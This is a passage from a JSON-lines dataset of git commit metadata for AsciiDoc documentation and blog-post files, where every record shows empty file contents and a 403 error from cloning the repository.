2016-02-03-What-is-this-Blog-about.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-03-What-is-this-Blog-about.adoc","new_file":"_posts\/2016-02-03-What-is-this-Blog-about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec66fcf61bddeba7145b39acbb6580d71ee097e4","subject":"Update 2016-06-27-json-decode-json-encode.adoc","message":"Update 2016-06-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a75f1f66a854154f3c4241654893b78592127d26","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"659a97a2159180cb344f459d147fd57856a0cbae","subject":"1.10.xxx Release","message":"1.10.xxx Release\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2018-xx-yy-release.adoc","new_file":"content\/news\/2018-xx-yy-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d373e1b49c85d2fc85d2db083a28b4b837c55220","subject":"Fix the search request default operation behavior doc (#29302) (#29405)","message":"Fix the search request default operation behavior doc (#29302) (#29405)\n\n","repos":"coding0011\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch","old_file":"docs\/reference\/search\/request\/preference.asciidoc","new_file":"docs\/reference\/search\/request\/preference.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7e5baae9b3c0d9e663f5887782b808661164610","subject":"y2b create post Giant Curved OLED 4K TV","message":"y2b create post Giant Curved OLED 4K TV","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-19-Giant-Curved-OLED-4K-TV.adoc","new_file":"_posts\/2015-11-19-Giant-Curved-OLED-4K-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3f6e7cdcc60bbaaaefd4acd28f5bb5902cd5dc","subject":"Update 2015-09-17-Ganesha-Festival-on-17-Sep.adoc","message":"Update 2015-09-17-Ganesha-Festival-on-17-Sep.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-17-Ganesha-Festival-on-17-Sep.adoc","new_file":"_posts\/2015-09-17-Ganesha-Festival-on-17-Sep.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a352bd0f7a7e0fc5ffba37a0e336e7f5f8c18492","subject":"Update 2017-05-08-Static-Translations-Bundle.adoc","message":"Update 2017-05-08-Static-Translations-Bundle.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f3984ec6139870f9ac1ffcfe28a84e274902eb2","subject":"Update 2016-05-12-Flume.adoc","message":"Update 2016-05-12-Flume.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-12-Flume.adoc","new_file":"_posts\/2016-05-12-Flume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"765a6a226732650ae0c7fe099feaf296e1bed19c","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07648565844e615dc8f15c5b1184eded770717ce","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd0b684e1bdcc7d80ea94fd56b40570861eecdbb","subject":"y2b create post DC Universe Online Collectors Edition (PS3) Unboxing \\u0026 Overview + Macro Shots!","message":"y2b create post DC Universe Online Collectors Edition (PS3) Unboxing \\u0026 Overview + Macro Shots!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-13-DC-Universe-Online-Collectors-Edition-PS3-Unboxing-u0026-Overview--Macro-Shots.adoc","new_file":"_posts\/2011-01-13-DC-Universe-Online-Collectors-Edition-PS3-Unboxing-u0026-Overview--Macro-Shots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b885ab0593b607dda7d6149c0054d7a387edbcd4","subject":"Update 2015-06-01-Weiter-gehts-Die-Story-II.adoc","message":"Update 2015-06-01-Weiter-gehts-Die-Story-II.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-01-Weiter-gehts-Die-Story-II.adoc","new_file":"_posts\/2015-06-01-Weiter-gehts-Die-Story-II.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3eb0eaf904614fe3c456c1f994663842e268d15f","subject":"Update 2015-05-14-test.adoc","message":"Update 2015-05-14-test.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-test.adoc","new_file":"_posts\/2015-05-14-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39cc67c53703216ec306b1d6f21fa64f952889a0","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2973f5fcd86aba20a213ba4e54328a138618968","subject":"Update 2016-07-22-Ciao.adoc","message":"Update 2016-07-22-Ciao.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-Ciao.adoc","new_file":"_posts\/2016-07-22-Ciao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d6e4cfaef6ffc258c661622ae401b63b6d3fb12","subject":"y2b create post Wearable Bass = MIND BLOWN?","message":"y2b create post Wearable Bass = MIND BLOWN?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-28-Wearable-Bass--MIND-BLOWN.adoc","new_file":"_posts\/2016-06-28-Wearable-Bass--MIND-BLOWN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"489c9fecf728e23a1421a26d3bcb7b2fefce1dbc","subject":"Update 2015-09-30-New-post.adoc","message":"Update 2015-09-30-New-post.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2015-09-30-New-post.adoc","new_file":"_posts\/2015-09-30-New-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e72c14c3afb7f84f01bdf248bb8d2e8ab0878f","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89887621d94f7da1622170ae603570892b544fa1","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1b7740c0383782eef4feb673f473d981f84f85c","subject":"Update 2019-08-24-Impossible-Box-de-Mexico.adoc","message":"Update 2019-08-24-Impossible-Box-de-Mexico.adoc","repos":"ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io","old_file":"_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc","new_file":"_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImpossibleBlog\/impossibleblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"131e41828e18b37321179d7020054ae2318f5885","subject":"Add README for github.","message":"Add README for github.\n\nSigned-off-by: Florent Bruneau <5d0958454f46908a14eb42e25abfc486c9e7cb2c@polytechnique.org>\n","repos":"Fruneau\/pfixtools,Fruneau\/pfixtools","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fruneau\/pfixtools.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"404c2916bbf7dbb09fb366b8da80e2c266a0ace0","subject":"Update 2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","message":"Update 2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","new_file":"_posts\/2017-05-07-Introducing-asciidoc-admonition-icons-a-Git-Book-plugin-to-restore-font-icons-for-Ascii-Doc-admonition-blocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52a517e2165d4589c456b6c1bc2faede5f3c3637","subject":"Docs: Add example of resetting index setting (#29048)","message":"Docs: Add example of resetting index setting (#29048)\n\nThis commit adds an example using `null` to reset an index settings.\r\n\r\ncloses #22870","repos":"s1monw\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/indices\/update-settings.asciidoc","new_file":"docs\/reference\/indices\/update-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc9b4ce056787fa4bda78f2b7a63a628dbe54c4c","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa02df2dd19b548847fac7c65f1693e8c81b74f6","subject":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","message":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c792dee8cf5280e10265832012fdc8613bb615d0","subject":"BoV: Vaadin 8 changes to Grid documentation.","message":"BoV: Vaadin 8 changes to Grid documentation.\n\nChange-Id: I1c9812a5c6d8a3386bff9b1599a6f914947f8dde\n","repos":"asashour\/framework,Legioth\/vaadin,mstahv\/framework,kironapublic\/vaadin,mstahv\/framework,Legioth\/vaadin,Darsstar\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,asashour\/framework,peterl1084\/framework,asashour\/framework,peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,asashour\/framework,Legioth\/vaadin,mstahv\/framework,Legioth\/vaadin,Darsstar\/framework,Legioth\/vaadin,peterl1084\/framework,Darsstar\/framework,Darsstar\/framework,kironapublic\/vaadin","old_file":"documentation\/components\/components-grid.asciidoc","new_file":"documentation\/components\/components-grid.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kironapublic\/vaadin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34b7c4066083b439be4f4a9e5ce773527b9eac80","subject":"Add more detailed quickstart for config server","message":"Add more detailed quickstart for config server\n","repos":"royclarkson\/spring-cloud-config,shakuzen\/spring-cloud-config,fkissel\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,rajkumargithub\/spring-cloud-config,rajkumargithub\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,royclarkson\/spring-cloud-config,spring-cloud\/spring-cloud-config,fangjing828\/spring-cloud-config,mbenson\/spring-cloud-config,royclarkson\/spring-cloud-config,thomasdarimont\/spring-cloud-config,appleman\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,mstine\/spring-cloud-config,fangjing828\/spring-cloud-config,appleman\/spring-cloud-config,mbenson\/spring-cloud-config,spring-cloud\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fkissel\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fkissel\/spring-cloud-config,mstine\/spring-cloud-config,marbon87\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"484a2cdad2f39dd5cb34dc791fe451b0cf51fe1f","subject":"Update 2015-07-24-The-Lives-of-Robots-and-Rubber.adoc","message":"Update 2015-07-24-The-Lives-of-Robots-and-Rubber.adoc","repos":"sidemachine\/sidemachine.github.io,sidemachine\/sidemachine.github.io,sidemachine\/sidemachine.github.io","old_file":"_posts\/2015-07-24-The-Lives-of-Robots-and-Rubber.adoc","new_file":"_posts\/2015-07-24-The-Lives-of-Robots-and-Rubber.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidemachine\/sidemachine.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e78f5ff0a6adb3b93e6d695d567943a692875e9","subject":"Update 2015-11-21-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","message":"Update 2015-11-21-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-21-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","new_file":"_posts\/2015-11-21-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90953b9d6b0f71442f53216ff7b579153fda819c","subject":"Update 2015-02-13-Episode-15-Facts-are-Hard.adoc","message":"Update 2015-02-13-Episode-15-Facts-are-Hard.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-02-13-Episode-15-Facts-are-Hard.adoc","new_file":"_posts\/2015-02-13-Episode-15-Facts-are-Hard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c83db796944f6901a08d8d2b7e397efb4828c56d","subject":"Update 2018-11-27-TDI-Setup-in-Windows-2012.adoc","message":"Update 2018-11-27-TDI-Setup-in-Windows-2012.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-11-27-TDI-Setup-in-Windows-2012.adoc","new_file":"_posts\/2018-11-27-TDI-Setup-in-Windows-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adfbd74adfccef9599763e02826a541b07e4efed","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77b563bacea8df53ca083d1a0b250399e61bb786","subject":"Faster debug sessions","message":"Faster debug sessions\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/14-setup-eclipse.adoc","new_file":"src\/sections\/14-setup-eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"601782929ecc3aaba83f85482f5a98166a992418","subject":"1.9 Final release announcement","message":"1.9 Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2022-04-06-debezium-1.9-final-released.adoc","new_file":"_posts\/2022-04-06-debezium-1.9-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13e56b6dc3a1d8d1ffacbbf9d882422583f9609c","subject":"Zeitverhalten - Beschreibung wie man zu den Anforderungen bei Webanwendungen kommen kann","message":"Zeitverhalten - Beschreibung wie man zu den Anforderungen bei Webanwendungen kommen kann\n","repos":"arc42\/quality-requirements","old_file":"src\/asciidoc\/04_effizienz_herangehensweise_zeitverhalten.adoc","new_file":"src\/asciidoc\/04_effizienz_herangehensweise_zeitverhalten.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arc42\/quality-requirements.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05f41e0fcb70dbc7d87e606461550b305ac51198","subject":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","message":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b53b4d27e4c5d67b3274d5d121ccc6ed6fb318a","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubikey-val,ahojjati\/yubikey-val,Yubico\/yubikey-val,ahojjati\/yubikey-val,Yubico\/yubikey-val,ahojjati\/yubikey-val","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-val.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"613e0727d32a0f6c357c695dd696808a5271b36d","subject":"Create README.adoc","message":"Create README.adoc","repos":"schnawel007\/jsEventBus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/schnawel007\/jsEventBus.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ac728d22bf6375a78daa171095e918a54932f7c","subject":"Docs: Update 